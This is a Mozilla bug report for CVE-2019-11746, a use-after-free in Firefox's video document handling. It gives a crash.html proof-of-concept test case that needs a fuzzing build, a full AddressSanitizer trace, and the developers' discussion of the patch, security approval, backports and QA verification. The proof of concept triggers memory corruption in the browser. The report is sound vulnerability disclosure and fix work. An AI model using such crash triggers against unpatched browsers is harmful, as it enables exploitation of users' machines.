1564449 - (CVE-2019-11746) heap-use-after-free in mozilla::dom::VideoDocument::CreateVideoElement

Status: VERIFIED FIXED

(Core :: DOM: Core & HTML, defect, P1)

Description

Attachment: test-encrypted-different-av-keys.webm

The following testcase crashes the latest ASAN build of Firefox 70.0a1 (BuildID=20190709034824). It requires a fuzzing build (--enable-fuzzing) and the pref user_pref("fuzzing.enabled",true). I am using a Python2 webserver (python -m SimpleHTTPServer) to host the testcase. It requires the attached webm file in the same directory. It works most reliable when loaded in many tabs at the same time.

crash.html:

<script>
var fun1_called=0,fun2_called=0;
function spin() {
    var x=new XMLHttpRequest();
    x.open("POST","/post",false);
    x.send("X");
}
function start() {
	o10=new AudioContext();
	o15=window.open('test-encrypted-different-av-keys.webm','popup34'+Math.random(),'height=54,width=-5,centerscreen,outerWidth=12,status,scrollbars');
	o19=window.document;
    window.top.setTimeout(fun0, 4);
}
function fun0() {
	o15.addEventListener('DOMSubtreeModified',fun1);
}
function fun1() {
    if(window.top.fun1_called++)return;
    spin();
	o15.fun2=fun2;o15.eval("location.href='javascript:fun2(this,document,window)'");
    spin();
	o123=o19.createElement('frameset');
    try{o98.body=o123;}catch(e){}
    spin();
}
function fun2(othis, doc, t, count) {
    if(window.top.fun2_called++)return;
	window.top.o98=doc;
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==12771==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00009e8e0 at pc 0x7f7ffe67f8e7 bp 0x7ffd585903b0 sp 0x7ffd585903a8
READ of size 8 at 0x60d00009e8e0 thread T0 (Web Content)
    #0 0x7f7ffe67f8e6 in AppendChildTo /builds/worker/workspace/build/src/dom/base/nsINode.h:769:12
    #1 0x7f7ffe67f8e6 in mozilla::dom::VideoDocument::CreateVideoElement() /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:135
    #2 0x7f7ffe67ef69 in mozilla::dom::VideoDocument::StartLayout() /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:73:17
    #3 0x7f7ffe64f46d in mozilla::dom::MediaDocumentStreamListener::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/dom/html/MediaDocument.cpp:55:14
    #4 0x7f7ff8ab986c in nsDocumentOpenInfo::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:311:34
    #5 0x7f7ff6bbf891 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #6 0x7f7ff6bcc6fd in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #7 0x7f7ff6c97469 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #8 0x7f7ff6a3e886 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #9 0x7f7ff6bca7c3 in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #10 0x7f7ff7904ebf in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #11 0x7f7ff75dac19 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #12 0x7f7ff72b3236 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #13 0x7f7ff72ae13b in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #14 0x7f7ff72b06f7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #15 0x7f7ff72b1487 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #16 0x7f7ff5e698b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #17 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7f7ff72bc5f4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
    #20 0x7f7ff7193afe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7f7ff7193afe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7f7ff7193afe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7f80008e24a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7f8004f5f10e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #25 0x7f7ff7193afe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7f7ff7193afe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7f7ff7193afe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7f8004f5dc51 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #29 0x55bf9ba64113 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #30 0x55bf9ba64113 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #31 0x7f801af30b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x55bf9b98564c in _start (/home/nils/browser/firefox/firefox/firefox+0x4564c)

0x60d00009e8e0 is located 0 bytes inside of 136-byte region [0x60d00009e8e0,0x60d00009e968)
freed by thread T0 (Web Content) here:
    #0 0x55bf9ba30ce2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f7ff5c97378 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
    #2 0x7f7ff5c97378 in SnowWhiteKiller::Visit(nsPurpleBuffer&, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459
    #3 0x7f7ff5c6afb3 in void nsPurpleBuffer::VisitEntries<SnowWhiteKiller>(SnowWhiteKiller&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:956:27
    #4 0x7f7ff5c6c6d8 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2624:14
    #5 0x7f7ff83f525c in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
    #6 0x7f7ff5ecdf62 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:331:22
    #7 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #8 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #9 0x7f80003af2e3 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:348:25
    #10 0x7f80003af2e3 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*, bool) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909
    #11 0x7f80003acf5a in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2727:11
    #12 0x7f7ffcac17cd in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1346:24
    #13 0x7f7ffd8fc222 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3181:13
    #14 0x7f800523e8a7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #15 0x7f800523e8a7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #16 0x7f800521ee80 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #17 0x7f800521ee80 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3088
    #18 0x7f80052085e8 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #19 0x7f800523f3af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #20 0x7f80052415d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #21 0x7f8005faa7cf in js::ForwardingProxyHandler::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #22 0x7f8005f66d11 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:237:19
    #23 0x7f8005f89c8d in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:504:19
    #24 0x7f800523fa75 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:14
    #25 0x7f80052415d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #26 0x7f8005ed3cc8 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2658:10
    #27 0x7f7ffced92fe in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:52:8
    #28 0x7f7ffe197924 in HandleEvent<mozilla::dom::EventTarget *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #29 0x7f7ffe197924 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1024
    #30 0x7f7ffe199847 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1222:17
    #31 0x7f7ffe17a161 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #32 0x7f7ffe17a161 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #33 0x7f7ffe178875 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:587:14
    #34 0x7f7ffe17f104 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #35 0x7f7ffe186e4b in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp

previously allocated by thread T0 (Web Content) here:
    #0 0x55bf9ba31063 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55bf9ba65dcd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f7ffe42be4b in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f7ffe42be4b in NS_NewHTMLBodyElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLBodyElement.cpp:24
    #4 0x7f7ffe660643 in mozilla::dom::MediaDocument::CreateSyntheticDocument() /builds/worker/workspace/build/src/dom/html/MediaDocument.cpp:235:39
    #5 0x7f7ffe67fa3a in mozilla::dom::VideoDocument::SetScriptGlobalObject(nsIScriptGlobalObject*) /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:89:30
    #6 0x7f7ffa148eac in nsGlobalWindowOuter::SetNewDocument(mozilla::dom::Document*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:2169:14
    #7 0x7f8001190c8a in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:967:22
    #8 0x7f800118fc0c in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:718:10
    #9 0x7f8004044f60 in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8551:7
    #10 0x7f8004043b51 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6387:17
    #11 0x7f8003fcb7c4 in nsDocShell::CreateContentViewer(nsTSubstring<char> const&, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8354:3
    #12 0x7f8003fc84aa in nsDSURIContentListener::DoContent(nsTSubstring<char> const&, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:183:20
    #13 0x7f7ff8abe983 in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:748:18
    #14 0x7f7ff8abafb4 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:420:30
    #15 0x7f7ff8ab9666 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:299:8
    #16 0x7f7ff6bbf891 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #17 0x7f7ff6bcc6fd in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #18 0x7f7ff6c97469 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #19 0x7f7ff6a3e886 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #20 0x7f7ff6bca7c3 in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #21 0x7f7ff7904ebf in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #22 0x7f7ff75dac19 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #23 0x7f7ff72b3236 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #24 0x7f7ff72ae13b in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #25 0x7f7ff72b06f7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #26 0x7f7ff72b1487 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #27 0x7f7ff5e698b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #28 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #29 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #30 0x7f7ff72bc5f4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/base/nsINode.h:769:12 in AppendChildTo
Shadow bytes around the buggy address:
  0x0c1a8000bcc0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa 00 00
  0x0c1a8000bcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1a8000bce0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1a8000bcf0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c1a8000bd00: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1a8000bd10: 00 00 00 fa fa fa fa fa fa fa fa fa[fd]fd fd fd
  0x0c1a8000bd20: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a8000bd30: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000bd40: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1a8000bd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000bd60: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==12771==ABORTING

Comment 1

[Nils]

Attachment: ASAN output

Comment 2

[Nils]

Attachment: crash.html (minimised testcase)

Comment 3

[Olli Pettay [:smaug][bugs@pettay.fi]]

Nothing keeps body alive.

Comment 4

[Olli Pettay [:smaug][bugs@pettay.fi]]

Hard to come up with a good commit message for this :)

Comment 5

[Olli Pettay [:smaug][bugs@pettay.fi]]

Attachment: Bug 1564449, ensure the right body element is used throughout the method call, r=mccr8

Comment 6

[Olli Pettay [:smaug][bugs@pettay.fi]]

hmm, plugin document has the same issue, and image document

Comment 7

[Olli Pettay [:smaug][bugs@pettay.fi]]

Comment on attachment 9077506 [details]
Bug 1564449, ensure the right body element is used throughout the method call, r=mccr8

Security Approval Request

• How easily could an exploit be constructed based on the patch?: The patch does pinpoint where the issue is.
• Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
• Which older supported branches are affected by this flaw?: all
• If not all supported branches, which bug introduced the flaw?: None
• Do you have backports for the affected branches?: Yes
• If not, how different, hard to create, and risky will they be?: (The same patch seems to apply even to esr60)
• How likely is this patch to cause regressions; how much testing does it need?: Very unlikely, just keeping an object alive a tad longer.

Beta/Release Uplift Approval Request

• User impact if declined: security sensitive crashes
• Is this code covered by automated tests?: No
• Has the fix been verified in Nightly?: No
• Needs manual test from QE?: No
• If yes, steps to reproduce:
• List of other uplifts needed: None
• Risk to taking this patch: Low
• Why is the change risky/not risky? (and alternatives if risky):
• String changes made/needed:

ESR Uplift Approval Request

• If this is not a sec:{high,crit} bug, please state case for ESR consideration:
• User impact if declined:
• Fix Landed on Version:
• Risk to taking this patch: Low
• Why is the change risky/not risky? (and alternatives if risky):
• String or UUID changes made by this patch:

Comment 8

[Al Billings [:abillings - ex-MoCo]]

Because of the obviousness of the fix, I'm giving sec-approval+ but only for checkin on August 6, 2019, a bit further into the current cycle. We'll want to backport this to Beta, ESR68, and ESR60 at that time.

Comment 9

[BugBot [:suhaib / :marco/ :calixte]]

There's a r+ patch which didn't land and no activity in this bug for 2 weeks.
:smaug, could you have a look please?
For more information, please visit auto_nag documentation.

Comment 10

[Olli Pettay [:smaug][bugs@pettay.fi]]

https://hg.mozilla.org/integration/mozilla-inbound/rev/f54322689aa9f5eea3774fb945e8ee37a4e5241b

Comment 11

[Sebastian Hengst [:aryx] (needinfo me if it's about an intermittent or backout)]

https://hg.mozilla.org/mozilla-central/rev/f54322689aa9

Comment 12

[Pascal Chevrel:pascalc]

Comment on attachment 9077506 [details]
Bug 1564449, ensure the right body element is used throughout the method call, r=mccr8

Landed on mozilla-central and has sec-approval+, uplift approved for this week 69 beta 12.

Comment 13

[Sebastian Hengst [:aryx] (needinfo me if it's about an intermittent or backout)]

https://hg.mozilla.org/releases/mozilla-beta/rev/f31f9a54b70e

Comment 14

[Julien Cristau [:jcristau]]

Comment on attachment 9077506 [details]
Bug 1564449, ensure the right body element is used throughout the method call, r=mccr8

sec fix, approved for 68.1 and 60.9

Comment 15

[Sebastian Hengst [:aryx] (needinfo me if it's about an intermittent or backout)]

https://hg.mozilla.org/releases/mozilla-esr68/rev/9b7159c38798

Comment 16

[Sebastian Hengst [:aryx] (needinfo me if it's about an intermittent or backout)]

https://hg.mozilla.org/releases/mozilla-esr60/rev/23d04c883edb

Comment 17

[Rares Doghi, Desktop QA]

Hi, I managed to reproduce this issue in an older version of Nightly but this issue no longer occurs on Esr 60.9, 68.1, Beta 69.0b12 or our latest Nightly build. I will mark this issue accordingly.